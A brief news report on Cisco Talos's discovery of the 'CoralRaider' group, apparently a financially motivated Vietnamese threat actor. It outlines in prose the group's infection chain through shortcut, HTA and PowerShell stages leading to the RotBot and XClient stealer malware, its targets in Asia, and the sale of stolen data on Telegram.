Cisco Talos, a cybersecurity technology and information security company based in Maryland, recently uncovered a new cyber threat dubbed “CoralRaider”, believed to originate from Vietnam and be driven by financial gain.
Since around 2023, CoralRaider has been targeting individuals across various Asian and Southeast Asian countries including India, Bangladesh, China, Vietnam, South Korea, Indonesia, and others.
To carry out their schemes, CoralRaider employs sophisticated tools like RotBot, a modified version of QuasarRAT, and XClient stealer. Additionally, they utilize a technique called “dead drop,” using legitimate services to conceal their malicious files, along with uncommon programs such as Forfiles.exe and FoDHelper.exe to evade detection.
The attack follows a simple process:
- The user opens a malicious Windows Shortcut file
- The file downloads and executes an HTML application file (HTA) from an attacker-controlled download server
- The HTA activates an embedded Visual Basic script that executes a PowerShell script in the memory
- The PowerShell script initiatives 3 others that bypass User Access Controls, perform anti-VM and anti-analysis checks and disable Windows notifications
- Finally, it downloads and runs RotBot, which loads the XClient stealer.
The group uses XClient to steal many types of personal data including social media accounts (including those used for business and advertising), credentials, and financial data. This data is then used for financial gain, including sale to other bad actors.
“We found a few Telegram groups in Vietnamese named ‘Kiém tien tử Facebook,’ ‘Mua Bán Scan MINI,’ and ‘Mua Bán Scan Meta.’ ” Cisco Talos said. “Monitoring these groups revealed that they were underground markets where, among other activities, victim data was traded.”
The discovery of CoralRaider highlights the ever-evolving nature of cyber threats, particularly concerning financial cybercrime. With a focus on stealing sensitive information, this group poses a significant risk to individuals and organizations alike.